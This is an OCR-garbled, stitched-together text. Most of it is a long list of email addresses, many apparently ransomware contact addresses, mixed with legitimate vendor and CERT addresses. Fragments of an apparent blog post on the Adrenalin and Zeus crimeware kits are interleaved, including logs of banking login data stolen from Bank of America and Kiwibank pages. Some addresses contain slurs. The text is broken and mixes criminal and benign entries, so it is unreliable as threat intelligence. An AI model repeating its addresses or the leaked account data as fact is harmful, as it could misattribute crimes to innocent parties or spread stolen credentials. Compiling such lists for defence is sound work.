mario.jolly@mailfence.com 
cryoteons@protonmail.com 
mrnice@riseup.net 
H911X@yahoo.com 
1413201760@qq.com 
lolyta _restore@protonmail.ch 
freelocker@riseup.net 
yakomoko@protonmail.com 
zacapa@cock.li 
makalikozo@cock.li 
makalikozo@protonmail.com 
hnx911@yahoo.com 
virusjahid4209@cyberper.net 
viruszone4209@opentrash.com 
zalton@tuta.io 
mujkontakt@protonmail.com 
niggapoopoo1l23@protonmail.com 
imbun6@gmail.com 
frankhans@tuta.io 
ssget@protonmail.com 
zinton@tuta.io 
bufalo@boximail.com 
langdirul1887@protonmail.com 
mawienkiu@yandex.com 
letsgetyourfileback@protonmail.com 
letgetyourfileback@protonmail.com 
GiveMeTheKey@protonmail.com 
12334@gmail.com 
jamesgonzaleswork1972@protonmail.com 
pretty hardjob2881@mail.com 
dprworkjessiaeyel1955@tutanota.com 
Bernardocarlos@tutanota.com 
Deanlivermore@protonmail.com 
robertatravels@mail.com 
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Derekvirgil@protonmail.com 
Samanthareflock@mail.com 
Gerardbroncks@tutanota.com 
SamanthaKirbinron@protonmail.com 
DenisUfliknam@protonmail.com 
RobertGorgris@protonmail.com 
PepperTramcrop@protonmail.com 
TigerLadentop@protonmail.com 
JeromeRotterberg@protonmail.com 
Keith Travinsky1985@protonmail.com 
HermioneHatchetman@protonmail.com 
WilliamShrieksword@protonmail.com 
DineshSchwartz1965@protonmail.com 
RupertMariner1958@protonmail.com 
StephanForenzzo1985@protonmail.com 
EdsonEpsok@protonmail.com 
Alfredhormund@protonmail.com 
timothymandock@tutanota.com 
Pameladuskhock@protonmail.com 
Tamarabuildpop@protonmail.com 
GilbertoPortaless@tutanota.com 
bobbybarnett2020@protonmail.com 
friedashumes@protonmail.com 
markngibson10@protonmail.com 
AlanMorbenhal@protonmail.com 
Killianoprahh@protonmail.com 
MonicaTuskmarka@tutanota.com 
laraholmort@protonmaill.com 
Geenakormann@protonmail.com 
ChiaraKolkmann@tutanota.com 
befittingdavid@protonmail.com 
luizunwrite2020@protonmail.com 
paologaldini2Z020@tutanota.com 
Mariajackson2020williams@protonmail.com 


MariaJackson2019williams@protonmail.com 
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StephanVeamont1997C@tutanota.com 
Johnmoknales@protonmail.com 
Thomposmirk@protonmail.com 
Jeremynorton@tutanota.com 
markZ9910@protonmail.com 
Yess99334412@tutanota.com 
christopherlampar1990@tutanota.com 
rodtherry1985@tutanota.com 
lewisldupre@protonmail.com 


Jeremyspineberg11@tutanota.com 


GeromeSkinggagard1999@tutanota.com 


Jeremyspineberg11@protonmail.com 
Angiemerryman@tutanota.com 
Robertoferris@protonmail.com 
Allenmalone@onionmall.org 
Allenmalone@onionmail.org 
neger@cock.li 

neger2@cock.li 
checlkyourflles@protonmail.com 
helptounlock@protonmail.com 
helper571@protonmail.com 
rdp571@protonmail.ch 
Black.Berserks@yakuzacrypt.com 
Black.Berserks@protonmail.com 
ScorpionEncryption@yakuzacrypt.com 
maedeh81@yakuzacrypt.com 
maedeh81@firemail.cc 
newbang@protonmail.com 
newbang@cock.|i 
Founder94@yakuzacrypt.com 
Founder94@tutanota.com 
alfryy@yakuzacrypt.com 
alfryy@cock.li 
aes256@criptexst.com 


thetaprogram@keemail.me 
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tesladecryption@cyberfear.com 
tesladecryption@cock.li 
angelmorales0O123@mailfence.com 
unknwonteam@criptext.com 
fixbyfinch@tutanota.com 
miclejaps@msgden.net 
stevenjoker@msgden.net 
CulibDoett@gmail.com 
ha7medtit@tutanota.com 
araujosantos@protonmail.com 
iamwaldo@tutamail.com 
ZirO@airmail.cc 
ZirO@keemail.me 
thecurelegion@protonmail.com 
generalchin@countermail.com 
ashtray@outlookpro.net 
askebeger@protonmail.com 
askebeger@xmpp.jp 
test@mail.com 
MrPalang@Cock.li 
MrPalang@mail2tor.com 
ShadowofdeathAdmin@mail2tor.com 
stevenxx134@gmail.com 
Encryptedxtredboy@protonmail.com 
steven77xx@mail.ru 
Hichkasam@protonmail.com 
helpdiamond@protonmail.com 
unlOckerpkx@tutanota.com 
Elmershawn@aol.com 
encryptc4@protonmail.com 
decoderma@tutanota.com 
decoderma@protonmail.com 
missdecryptor@protonmail.com 
VoidFiles@tutanota.com 
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Pentagonl11@protonmail.com 
guaranteedsupport@protonmail.com 
coronavirus19@tutanota.com 
ghostmax@cock.li 
decrypterfile@mailfence.com 
hosdecoder@aol.com 
decrypterfile@protonmail.com 
colderman@mailfence.com 
encryptfile@protonmail.com 
encryptfile@cock.li 
rsaencrypt@tutanota.com 
rsaencrypt@protonmail.ch 
SpadeEncrypt@tutanota.com 
SpadeEncrypt@protonmail.com 
decinfo7@gmail.com 
dr8002dr@mailfence.com 
peace491@tuta.io 
alix1011@mailfence.com 
honorsafe@keemail.me 
honorsafe@protonmail.ch 
galivertones@aol.com 
lossdata@tutanota.com 
encryptadm@criptext.com 
decryptadm@criptext.com 
Windows358@tuta.io 
windows358@mailfence.com 
rebkeilo@gmail.com 
decode.emf@tutanota.com 
Adm0251@tuta.io 
Aser51a0@protonmail.io 
helpforfiles@cock.li 
helpforfiles@criptext.com 
whiopera@tutanota.com 
whiopera@aol.com 
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Openfileyou@mailfence.com 
wyooy@tutanota.com 
Decode@criptext.com 
Howtodecrypt@elude.in 
xmasnpor@tuta.io 
iwantfiles2016@gmail.com 
Backupyourfiles2016@gmail.com 
whirmx@gmail.com 
whirmx@tutanota.com 

Dark evil@tutanota.com 
helpcenter2008@gmail.com 
voidcrypthelp@gmail.com 
ahms@mail.ru 

djek77d@aol.com 
GAmmA37@protonmail.ch 
kupidon@cock.li 
ann4.orlova.892@yandex.ru 

sifre cozucu@protonmail.com 
sifreci@protonmail.com 
dosyacoz9@protonmail.com 
smaug _raas@secmail.pro 
smaug-ransomware@protonmail.com 
ttviper@secmail.pro 
sOlid3r@tuta.io 
programiletisim1@gmail.com 
20dfs@keemail.me 
aksman@keemail.me 
cmsupport@secmail.pro 
cmsupport@airmail.cc 

Cobra Locker@protonmail.com 
Cobra _Locker2.0@protonmail.com 
CoronaDecryptOr@protonmail.com 
Cobra _Locker666@protonmail.ch 
CobraLocker@torbox3uiot6wchz.onion 


cobralocker@mail2tor.com 
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thechoicelinux@gmail.com 
jofkznve148172@outlook.com 
Hacker47817628648971@airmail.cc 
qqxxxxxqq@protonmail.com 
WWXXXxXxXwWW@protonmail.com 
txdot911@protonmail.com 
tjpoe911@protonmail.com 
embraer@protonmail.com 
0x69x@protonmail.com 
yogynicof@protonmail.com 
rkhairn@protonmail.com 
bobca@xmail.net 
beijing520@aol.com 
beijing520@cock.|i 
montanarecover@mail.ee 
genesishelp@mail.ee 
genesishelp@cock.li 
recofile@mail.ee 
recofile@mailfence.com 
520hard@mail.ee 
520hard@cock.li 
fastwindGlobe@protonmail.com 
fastwindGlobe@mail.ee 
fastwindGlobe@protonmail.co 
zewen93341@126.com 
SilentDeathDecryptor@protonmail.com 
raoox5y12date@protonmail.com 
rick5@xmpp.jp 
Malakot@protonmail.com 
malakot@tutanota.com 
malakot@mailfence.com 
nekross@tutanota.com 
deloneThunder@protonmail.com 
ThunderBirdXex@cock.li 


mbhelp@protonmail.com 
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akodesh@tutanota.com 
suppfilesencrypt@protonmail.com 
filesencryptedsupp@protonmail.com 
kazinbekdutch@tutanota.com 
kazinbekdutch@cock.|i 
kazinbekdutch@protonmail.com 
off the grid@tutanota.com 
wee wee@tutanota.com 
xmrlocker@goat.si 
xmrlocker@protonmail.ch 
xmrlocker2@airmail.cc 
xmrlocker@daum.net 
lockxmr@daum.net 
badbeeteam@mail.ee 
badbeeteam@cock.|i 
dogeremembersss@protonmail.ch 
omnisystems@airmail.cc 
hidalgoroberto859@gmail.com 
khalate@tutanota.com 
optimus982@tutanota.com 
khomeyni@tutanota.de 
sikbeker@tuta.io 
sikbeker@protonmail.ch 
badlamadec@msgsafe.io 
diVesTaCil@protonmail.com 
ialpatntedu@protonmail.com 
sceledruspolyb@olsapp.com 
daemonescaract@noffea.com 
help _recouver@protonmail.com 
getyourdata@protonmail.com 
Cyberwars@protonmail.com 
pizhon@torbox3uiot6wchz.onion 
mail@mail.ru 
whoami98@mail2tor.com 


InstantRansom@gmail.com 
20992 


Without the web injection and the TAN grabbing ability, Adrenalin is your typical malware 
kit, whose only differentiation factor would have been the customer support in the form of 
the managed undetected malware binaries that naturally comes with it. However, it’s TAN 
grabbing ability, proprietary collection of data "around the forms", stripping content from 
virtual keyboards and automatic certificates collection on per host basis, and its ability to 


CompID umm_fros_O7aScOal 


IP 192,168,1.10 
Country = 
Report time 16:16:26 12,10,2008 


Version/Botmet 0,255,255,255/tst 

System time 13:15:32 12,10,2008, GMT +7:00 

Login time 00:02:20 

Windows version 5.1, build 2600, service pack 3 

Language 1033 

Process C:\Program Files\Internet Explorer\ IEXPLORE 


https://sitekey, bankofamerica, com/sas/signon.do 

Referer: https://www,bankofamerica,com 

Keys: non" value=""> <input type="hidden" name="sitekeySig 
yalue=""> <input type="hidden" name="sitekeySignon" value= 
<input type="hidden" name="sitekeySignon" yvalue=""> bank 
<input type="hidden" name="sitekeySignon" value=""> <input 
type="hidden" name="sitekeySignon" value=""> <input type=" 
Data: 


reason= 
Access_ID=hparki1o82x 
Access_ID_1= 
Current_Passcode= 
acct= 

pswd= 

from=homepage 
Customer Type=MODEL 
pmbutton=true 
pmloginid=pmloginid 
sitekeySignon=true 
Online_ID=hparkiio82x 
locale=en_US 

ditoken= 

iq ae 


state=AL 


clean the system from competing BHO-based trojans, make it special. 
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vgrieffers@gmail.com 


thefancybears@protonmail.com 


6281fjds93hdfj5396dfgk@gmail.com 


CryptoPrivacyRecovery@protonmail.com 


devosapp@aaathats3as.com 
vjkumaren@protonmail.com 
inspport@messagesafe.io 
employer21@protonmail.com 
alrescodercry@protonmail.com 
knotdecryptor@secmail.pro 
no-reply@forgetit.com 
medusalocker@protonmail.com 
dubai317898@gmail.com 
noclue3636@dnmx.org 
helper.china@aol.com 

Cris Horth@protonmail.com 
otp _crypte@exploit.im 
otpcrypte@protonmail.com 
CandieTodd@tutanota.com 
KevinDeloach@protonmail.com 
KellyReiff@tutanota.com 
AsaUribe@tutanota.com 
SheilaBeasley@tutanota.com 
CarolynDixon@tutanota.com 
SeanHemming@tutanota.com 
JeremyCampbel@protonmail.com 
judmebackup@tutanota.com 
filerecovery@mail2save.com 
secur it@zohomail.eu 
parasiteCIPH@tutanota.com 
parasite@cock.li 
parabite@tutanota.com 
parazite@tutanota.com 
alcmalcolm@cock.|i 
jetLOO@safe-mail.net 
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matryoshka.iosef@airmail.cc 
undelivered@onet.pl 
troublemaker113@mailfence.com 
troublemaker113@tutanota.com 
tedydecrypt@elude.in 
Goood.Morning@mailfence.com 
GooodMorning@tutanota.com 
GoodMorning9@cock.li 
Goood.Morningl1@mailfence.com 
GooodMorning1@tutanota.com 
John.Muller@mailfence.com 
JohnMuller88@tutanota.com 
picklock@elude.in 
ag3ntsm1th@tuta.io 
Eliot.Bing@mailfence.com 
EliotBing@tutanota.com 
EmmaGaller@cock.lu 
JohnKarick@tutanota.com 
MikeClarke@cock.|lu 
himalayaraas@dnmx.org 
CCSMEDIA.COMPLIANCE@protonmail.com 
retrievedata300@gmail.com 
bambolina2021@virgilio. it 
slamhelp123@gmail.com 
slamransomwareasistance@gmail.com 
siamransomwareasistance@gmal.com 
israel@mailfence.com 
kramexfile@tuta.io 
helpsforyou@mail.ru 
crusetfile@protonmail.com 
helpforyou@mail.ru 
test.test@gmail.com 
meldonii@india.co 
Gcaesar2@aol.com 
burgeer@protonmail.ch 
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afile@yahoo.com 
burakozkaya083@gmail.com 
Dr.Wonderspellhome@yahoo.com 
raziotix@tuta.io 
leesb@coscokorea.com 
dc1@imap.cc 
intercobros@protonmail.com 
intercobros@mailfence.com 
FilesRecoverDE@Gmail.com 
FilesRecoverFR@Gmail.com 
FilesRecoverFR@Onionmail.org 
God85Ar@yandex.com 
axitrun@tutanota.com 
davidgoldman@cock.li 
portedhiggens@firemail.cc 
reddragon3335799@protonmail.ch 
jalicry@pm.me 
crvhelp@dr.com 
dagsdruyt@cumallover.me 
hacker@gmail.com 
hacker2@gmail.com 
datarestore@iran.ir 
grandtheftfiles@cock.li 
hipanda@keemail.me 
hipandahi@protonmail.ch 
HelpMe24@tuta.io 
gareth.mckie3l|@protonmail.com 
001002003@secmail.pro 
ntroll22118@gmail.com 
ndavidgoldman@cock.|i 
nwaiting@bitmessage.ch 
nwaiting@india.com 
nobliviondecrypt@cock.li 
nanonimus.mr@yahoo.com 


nDiskDoctor@protonmail.com 
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nhelpshadow@india.com 
nhelpshadowe@firemail.cc 
npdfhelp@india.com 
npdfhelp@firemail.cc 
nmerosa@firemail.cc 
nvengisto@india.com 
nvengisto@firemail.cc 
nbufalo@firemail.cc 
nblower@india.com 
nblower@firemail.cc 
ngorentos2@firemail.cc 
nstoneland@firemail.cc 
nhelprestore@firemail.cc 
ndatarestore@iran.ir 
ngiveyoukey@tutanota.com 
nbeijing520@aol.com 
nbeijing520@cock.li 
njalicry@pm.me 
nBobGreen85@criptext.com 
nBobGreen85@aol.com 
nBobGreen85@tutanota.com 
nleakthemall@protonmail.com 
npotentialenergy@mail.ru 
Ben.betalen@protonmail.com 
Agella@scryptmail.com 
Mk.goro@aol.com 
haizenberg@aol.com 
black.world@tuta.io 
Applehelp@caramail.com 
youneedmail@protonmail.com 
Apple.pass@mail.com 
SharkO01@msgden.com 
assistant@bitmessage.ch 
keyforyou@tuta.io 
Decryptutility@protonmail.com 
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webmafia@asia.com 
slaker@india.com 
Blacknord@tutanota.com 
Helper023@cock.li 
Decrypthelp@qq.com 
jonskuper578@india.com 
Cho.dambler@yandex.com 
Blammo@cock.|i 
abu.khan@india.com 
Badfail@qq.com 
Noreply@kpnmail.eu 
wog@onionmaail.info 
recoverfile@mail2tor.com 
files4463@tuta.io 
TheZenis@Tutanota.com 
realunlocker@india.com 
jewsaintpeople@india.com 
vurten knyert@protonmail.com 
waiting@bitmessage.ch 
Recover@8chan.co 
synack@secmail.pro 
horsia@airmail.cc 
Julian.soto@gmail.com 
recoveryl@writeme.com 
truongquocvi@gmail.com 
Dsupport@protonmail.com 
regem _regum@aol.com.onion 
brbrcodes@gmail.com 
castor-troy-restore@protonmail.com 
savefiles@india.com 
paydecryption@qq.com 
petropasevich@aol.com 
blacklist@clock.li 
microsoftxyber@hackindex.com 


Grizzly@airmail.cc 
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supportfiless24@protonmail.ch 
Unlockmeplease@cock.li 
suppfirecrypt@qq.com 
incongnitoman@protonmail.com 
Cyberwars@qq.com 
InkognitoMan@tutamail.com 
yoursalvations@protonmail.ch 
wewillhelp@airmail.cc 
decryptgarranty@airmail.cc 
jakie.nunes@tutanota.com 
Pdfhelp@india.co 
Pdfhelp@india.com 
aztecdecrypt@protonmail.com 
helpshadow@firemail.cc 
cryptoplant@protonmail.com 
seed@firemail.cc 
pizdasobaki@protonmail.com 
NastasyaTurkina68@mail.ru 
payadobe@yahoo.com 
undogdianact1986@aol.com 
Donaldtrump@rapidteamail.com 
help24decrypt@cock.li 
callmegoat@protonmail.com 
cryptor55@cock.li 
Merosa@india.com 
Dr.crypt@aol.com 
ht2707@email.vccs.edu 
Mrpeterson@cock.li 
aq811@tutoanota.com 
Blackdragon43@yahoo.com 
NetGanster@protonmail.com 
F-data@protonmail.com 
Fetmyfilesback@airmail.cc 
centrumfr@india.com 


SecurCyber@yahoo.com 
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Anonymous1@metronet.hr 
Cryfixfoo@qq.com 
decryptxxx@protonmail.com 
Lockhelp@qq.com 
decrypttos@cock.li 

your last chance _help@elude.in 
eladovinl1975@protonmail.com 
your last chance@thesecure.biz 
checkcheck07@qq.com 
Mespinoza980@protonmail.com 
dfvdv@tutanota.com 
Datahelp@iran.ir 
backdata.company@aol.com 
Salesrestoresoftware@gmail.com 
SafeGman@protonmail.com 
Salesrestoresoftware@firemail.cc 
Keyfiles@cock.li 
charmant@firemail.cc 
rdpconnect@protonmail.com 
tomascry@protonmail.com 
coronaVi2022@protonmail.ch 
cashdashsentme@protonmail.com 
protonmolecule@gmx.us 
decryptxxx@protonmail.co 
fabianchik@mail.ru 
fabiansomware@mail.ru 

se _harrd@protonmail.com 
filii_noctis@aol.com 
datareestore@tutanota.com 
jessymail26@tuta.io 
infodeptl999@yandex.com 
eva.vitorino@mundinter.pt 
asok.t@nicouae.com 
nicouae@nicouae.com 
TomLee24@tuta.io 
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twovm1iqzi@aol.com 
recap@qq.com 
Buruk01@india.com 
decryptfiles@countermail.com 
villiamsscorj rembly@protonmail.com 
flopored@protonmail.com 
deszyfrowanie@airmail.cc 
ambulance@keemail.me 
hjelp.main@protonmail.com 
Savemyfiles@protonmail.com 
rsupport@protonmail.ch 
ywa.Contact _TarineOZA@Gmail.com 
crazy.hamster@aol.com 
wlojul@secmail.pro 
return.data@qq.co 
ffgghtdfg@cock.li 

your last _chance@thesecure.bi 
cashdashsentme@protonmail.co 
datahelp@techmail.info.er 
yOO000@protonmail.com 
yO0O0O0@yandex.com 
test@matl.com 

day O@aol.com 
HappyNewYear2021@tutanota.com 
hlper4y@cock.li 

20@email.tg 
supporten@swiftoption.com 
treider 2015@bk.ru 
AdamBrown89@protonmail.com 
AdamBrown89@tutanota.com 
pewpew@Protonmail.com 
SaveYou35@4295.com 
alphaoil@mail2tor.com 
Panama777@tutanota.com 
BaYeCheng@yeah.net 
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tiwal986@mail.ru 
133tsuppOrt1337@protonmail.com 
me@rescam.org 
satco@Cock.li 
kjkreinbrinkl6@my.trine.edu 
sales@yapigazetesi.com 
allcry@naij.com 
yourboss@email.com 
AskHelp@protonmail.com 
AskHelp@tutanota.com 
AskHelp@india.com 
20.anonimus.mr@yahoo.com 
coding 434@tutanota.com 
tara _fox5@aol.com 
khalate@protonmail.com 
masterlrestore@cock.li 
andres11@cock.li 
yourencypter@protonmail.com 
Backuppc@yandex.com 
Backuppc@dr.com 
_fud@india.com 
beijingS20@cock.li 
atlantis.cf@yandex.com 
atlantis _cf@protonmail.com 
berserk666@cock.li 
tenagliamirella@gmail.com 
ways.blackhatcyber789@gmail.com 
vahidkhazl23@qmail.com 
vahidkhaz123@gmail.com 
Blmmind@tuta.io 
dfgkbtprz@aol.com 
brcodesinfo@gmail.com 
adagekeys@qq.com 
20.cashdashsentme@protonmail.com 


ccryptor@protonmail.com 
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btc2017@india.com 

kaidrake@cock.li 
Helpassistant2120@mail.fr 
jsmithl974@mail.fr 
cobainOransom@cock.|i 
eula.2052.txt.coder007@protonmail.com 
install.exe.coderO07@protonmail.com 
money.doc.coder007@protonmail.com 
TagFile S.txt.coder007@protonmail.com 
vcredist.bmp.coder007@protonmail.com 
python.exe.coder007@protonmail.com 
python2.7.exe.coder007@protonmail.com 
python2.exe.coder007@protonmail.com 
20.coder007@protonmail.com 
unzip@zipezip.com 
20coinmoney@cock.li 
ways.Coinmoney@cock.li 
mccredieschlembach@aol.com 
help@x-mail.pro 
support@polarity.com.cy 
fixfilex@protonmail.ch 
BatHelp@tutona.com 
20.coronaVi2022@protonmail.ch 
systemdestroyer0108@gmail.com 
Adolfo70@5348.com 
Ahmad26@2336.com 
Aileen65@9033.com 
Beulah34@1490.com 

Billy20@4425.com 

Billy11@4302.com 

Blaine98@8771.com 
Deanna62@5595.com 
Glenna52@2606.com 

Tara72@1753.com 
crazykillerusakk@hotmail.com 
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rcs ee 


Version/Botmet 0,255,255,255/tst 


System time 15:47:58 30,10,2008, GMT +7:00 

Login time 28:58:16 

Windows version 5.1, build 2600, service pack 3 

Language 1033 

Process C:\Program Files\Internet Explorer\IEXPLORE.E 


https://www. kiwibank,co,nz/banking/Login, asp? 

Referer: https://www. kiwibank,co,nz/banking/Login. asp 

Keys: testtestxk?r 

document. IBForm.iPassword,value document. IBForm.iPassword.y 
document. IBForm. iPassword. value document. IBForm.iPassword.y 
document. IBForm.iPassword.value document. IBForm.iPassword.y 
document. IBForm. iPassword, value test2test2xgqr 

document. IBForm.iPassword, value 

Data: 


NAME=test2 

NZpass=test2 
PASSWORD=O0AEC4D9BCS2AB96E424CD05S7A5S9CC45EFF314107 
CAPTCHA= 

USRCAPTCHA=xggr 

a> 

e= 

iName= 

iPassword= 

iCaptcha= 


How do you actually measure the popularity of crimeware kit? Based on the the market 
share of the crime kit, or based on another benchmark? It’s all a matter a perspective and 
a quantitative/qualitative approach. For instance, | can easily argue that if the very same 
community was build around Adrenalin the way it was built around Zeus making the original 
Zeus release looks like an amateur-ish release, perhaps Adrenalin would have scaled pretty 
fast. Some of the community improvements include : 


- [2]Modified Zeus Crimeware Kit Comes With Built-in MP3 Player 


- [3]Modified Zeus Crimeware Kit Gets a Performance Boost 
- [4]Zeus Crimeware Kit Gets a Carding Layout 
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crazykillwel123@outlook.com 
badbeeteam@mail.cc 
mortalist cartamen@aol.com 
ransOmsupport@gmail.com 
dou876sh@tuta.io 
dou876sh@mail.ee 
btc.com@protonmail.ch 
yafunn@yahoo.com 
stoppiracy@email.su 
Citrteam@criptext.com 
Citrteam@aol.com 
20Cyber Baba2@aol.com 
biggsurprise@tutanota.com 
ochennado@tutanota.com 
decrypt@32system.epizy.com 
20Datahelp@iran.ir 
ways.Datahelp@iran.ir 
de _cryption@tuta.io 
itdecconsult@yahoo.com 
_decipher@keemail.me 
20decipher@keemail.me 
ways.Decipher@keemail.me 
Files2020@mailfence.com 
ways.Doctor@freelinuxmail.org 
tkrutik@facebook.com 
idunno@abv.bg 
jispidey@hotmail.com 
20nomoneynohoney@india.com 
Santa-helper@protonmail.com 
cabinas321smile@hotmail.com 
forensics@bitdefender.com 
heineken@tutanota.io 
20heineken@tuta.io 
ways.heineken@tuta.io 
20xser@tutanota.com 
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ways.xser@tutanota.com 
hallome@firemail.cc 
blackcatdj.harsha@gmail.com 
helpdjvu@india.com 
helpdjvu@firemail.cc 
helpDjvut@india.com 
helpDjvut@firemail.cc 
technopc@tutanota.com 
technopc@protonmail.com 
dorispackman@tuta.io 
Decrypt@criptext.com 
databack2@airmail.cc 

one _weak@rows.io 
g8k4u@keenail.me 
g8ksw@india.com 
help447@tuta.io 
zemblax@protonmail.com 
0405000330@inbox.ru 
0301192293@protonmail.com 
pabluklOcker638yzhgr@2tor.com 
JackieData@cock.li 
20.Epta.mcold@gmail.com 
20Epta.mcold@gmail.com 
ways.Epta.mcold@gmail.com 
erisfixer@tuta.io 
reservereserv@airmail.com 
execute@protonmail.com 
fairware@sigaint.org 
antichrist666@tutamail.com 
filel@keemail.me 
filelm@yandex.com 
filein@yandex.com 
fileig@gtechie.com 
raiden@mortalkombat.to 


customer@help.myway.com 
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email@mindspark.com 
geekhax@gmail.com 
calin.huidu@gmail.com 
firmadatalari@mail.ru 
coinsman@tutanota.com 
coinsman22@cock.|i 
coinsman@cock.li 
fletcher3@india.com 
20.Flatcher3@india.com 
mykeyhelp@protonmail.com 
passcode@gmx.com 
email@regprivate.ru 
tlalpidas1978@aol.com 
phobos help@xmpp.jp 
help-me-now@mail.bg 
Brandon@cdkconstruction.org 
gold84@cock.|i 
_morf56@meta.ua 
horsefucker@tuta.io 
20Grand _car@aol.com 
microcost@bigmir.net 
microcost@protonmail.ch 
royal flush@tutanota.com 
joker _money@tutanota.com 
glutezon@gmx.com 
6support6@cock.li 
gygabot@protonmail.com 
filerestore07@gmail.com 
20.worcservice@protonmail.ch 
ways.hannesschubertO@gmail.com 
albert9957@protonmail.com 
ashton8040@msgsafe.io 
branden4505@airmail.cc 
santino3046@tutanota.de 


yourdataok@tutanota.com 
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lafoievologjanini23@tutanota.com 
heetsdecoding@cock.|i 
best666decoder@protonmail.com 
best666decoder@tutanota.com 
20Helpmanager@mail.ch 
ways.helpmanager@mail.ch 
retrnyourfiles23@cock.li 
retrnyoufiles@tutanota.com 
SaveYou49@9399.com 
ASer51la0@mailfence.com 
gorkmork@tutanota.de 
jackgreenl13@protonmail.com 
price.decoding@tutanota.com 
price.decoding@aol.com 
cryptomavens@protonmail.com 
cryptomavens@eclipso.eu 
horsedealer@xmpp.jp 
howdecrypt@aol.com 
nomoreletters@protonmail.ch 
guifullchartill970@protonmail.com 
ayaan321308@gmail.com 
infileshop@gmail.com 
20info@morris2uk.com 
ways.Info@morris2uk.com 
allback@cock.li 
allback@tutanota.com 
allback@protonmail.ch 
antoniosanches@cock.li 
unlOckme@cock.|i 
JohnPennegZZ@aol.com 
LindaHunter474@gmail.com 
karlosdecrypt24@airmail.cc 
justbtcwillhelpu@firemail.cc 
3335799@protonmail.com 


recoverl010@mail.ru 
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recoveryscmyfiles@mail2tor.com 
legendencrypt1@criptext.com 
youhaveonechance@420blaze. it 
gizm0@cock.li 
gizm0@tutanota.com 

slanson _street8@protonmail.com 
bitcoins12@tutanota.com 
mr.lpcap@aol.com 
sekurlsa@ml1.net 
sekurlsa@mm.st 
1.kazkavkovkiz@cock.li 
2.Hariliuios@tutanota.com 
proxy-failover@mozilla.com 
paymentbtc@airmail.cc 
gorentos2@bitmessage.ch 
20@india.com 
ways.masterlock@india.com 
Mayth24@tutanota.com 
recoverydata@india.com 

ZY @tBO.org 

jj@protonmail.ch 
motox2016@protonmail.com 
Mr.fox8@india.com 
James2020m@cock.|i 
themail@cock.li 
usarity@aol.com 
azrdecryptorbuy@firemail.cc 
_24 7@protonmail.com 
Ciastko.zlukrem@gmail.co 
needhelp@onionmail.org 
spaxl425@protonmail.com 
spaxl425@aol.com 
niggapoopool23@protonmail.com 
mwt@ruggedinbox.com 


2_kill yourself 2@india.com 
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999@me2bgruzs6itptly.onion 
Rtsghost@outlook.com 
20.online24files@airmail.cc 
nightecho78@hotmail.com 
Marina.jeffeaux91@klachurch.org 
usertyty@protonmail.ch 
heryzajulil23@gmail.com 
pab.luk200@wp.pl 
Pab.luk500@gmail.com 
greenpeace 28@india.com 
paragonia92@tutanota.com 
Garner73@tiscali.it 
Pec.clean@protonmail.com 
decspeed@tutanota.com 
ocode@gmail.com 
20.pinkiwinki78@mail.ru 
support.3330@gmail.com 
info@cert.pl 

lorena@aol.com 
checlkyourfiles@protonmail.com 
qbix@qq.com 
2restOre@protonmail.com 
bkhtyaryrwzbh@gmail.com 
ways.Radxlove7@india.com 
tommyraga@aol.com 

hello _psecu@protonmail.com 
a-atmmastercard@rambler.ru 
andfilk@rambler.ru 
atmcarddepartment@rambler.ru 
caresfedex@rambler.ru 
dadosh@rambler.ru 
diacom1995@rambler.ru 
diorloval987@rambler.ru 
fight4justice@rambler.ru 
igorek1508@rambler.ru 
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ilyaru2008@rambler.ru 
klosipoval983@rambler.ru 
pabala@rambler.ru 
pumadancpumadance2008@rambler.ru 
saaleksandroval983@rambler.ru 
tigrra763@rambler.ru 
voven@rambler.ru 
westernuinon.office@rambler.ru 
zhakoroleval976@rambler.ru 

zko _ffpsh@rambler.ru 
ways.Sos@anointernet.com 
Paradiseconnect@protonmail.com 
RobertEvan78@criptext.com 
recoverydatas@bk.ru 
v-martjanov@mail.ru 
hannacry@p-security.|i 
203442516480@qq.com 
ways.3442516480@qq.com 
abchelper@sigant.org 
deathLOOd@protonmail.com 
support@adskeeper.co.uk 
developers72@gmail.com 
support@apple.com 
UltimateHelp@techmail.info 
UltimateHelo@keemail.me 
AstraRansomware@protonmail.com 
atomickule@tutanota.com 
atomickule@protonmail.com 
Auinfo@gmail.com 
Auninfol6@gmail.com 
ways.Auinfol6@gmail.com 
FILENAME.EXTENSION _id-RANDOMNUMBERS id-1026927078 av6é66@weekendwarrior55.com 
jack.ondo@mail.com 
infomacaonh@gmail.com 


unlockdata22@protonmail.com 
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20.aztecdecrypt@protonmail.com 
gooddecrypt@airmail.cc 
karusjok@gmail.com 
Ox1service@airmail.cc 
Grizzlymail@qq.com 
bitcoinrush@aol.com 
bigbrol@cock.li 
blackzd@derpymail.org 
blackzd@xmail.net 
blackoutsupport@ma112tor.com 
Sin.Jun@tom.com 
Legion@aol.com 

20Centurion Legion@aol.com 
ways.Centurion Legion@aol.com 
recoverydatal@protonmail.com 
coleman2021@airmail.cc 
decryptharma24@cock.|i 
Decryptharma@protonmail.com 
cosanostral9@protonmail.com 
51d15c58d6f18@51d15c58d6f51.com 
ath-4txop@jxsqdueil.net 
returndb@mail.fr 
returndb@tfwno.gf 
Helpme@freespeechmail.com 
ways.Crptlomand@india.com 
naiky@tin. it 

decoder@cock.|i 
decoderhelp@cock.|i 
pares@keemail.me 
pchelp@post.com 
xerx@usa.com 
suppteam03@yandex.com 
suppcop@india.com 
suppcop@yandex.ru 
xdfgh34rtj5e@rm3iz7y.cn 
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Work.pdf.id.ransomed@india.com 
steaveiwalker@india.com 
steavewalker@163.com 
BM-2cWSRwwinrcLGFiTNF5RxiwR8hW5jikSl1m@bitmessage.ch 
20helprecover@ghostmail.com 
catapultacrypt@cock.li 
cuzimvirus@yahoo.de 
cryptodancer@msgsafe.io 
getbitcoine10404@maildrop.cc 
20centrumfr@india.com 
ways.Centrumfr@india.com 
20.decryptallfiles@india.com 
ways.Decryptallfiles@india.com 
edwardgwozniak@protonmail.com 
nicholaslopez1975@tutanota.com 
harrietgoodman21@tutanota.com 
ruined@india.com 
paydecryption@go.com 
DIGITALKEY2@163.com 
stocklock@firemail.cc 
cristmas@india.com 
eV3ebe@tuta.io 
thunderhelp@tuta.io 
genal983@mbx.kz 
fastbob@tuta.io 

fastbob@cock.lu 

fessleak@qip.ru 

33postal@mail.fr 
pdf.id-8123712837 _file2@openmailbox.org 
20file2@openmailbox.org 
ways.File2@openmailbox.org 
files1147@gmail.com 
gravityz3r0@sigant.org 
e-mamorf56@meta.ua 


anon _bot666@protonmail.com 
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decryptfull@criptext.com 
spamrslt@inbox.ru 
gamigin0612@tutanota.com 
Giovanni33@4311.com 
unhappymalware@protonmail.com 
FireFoxPlugin@get-a-clip.com 
9cbahij2@india.com 
Telegram@comodosecurity.com 
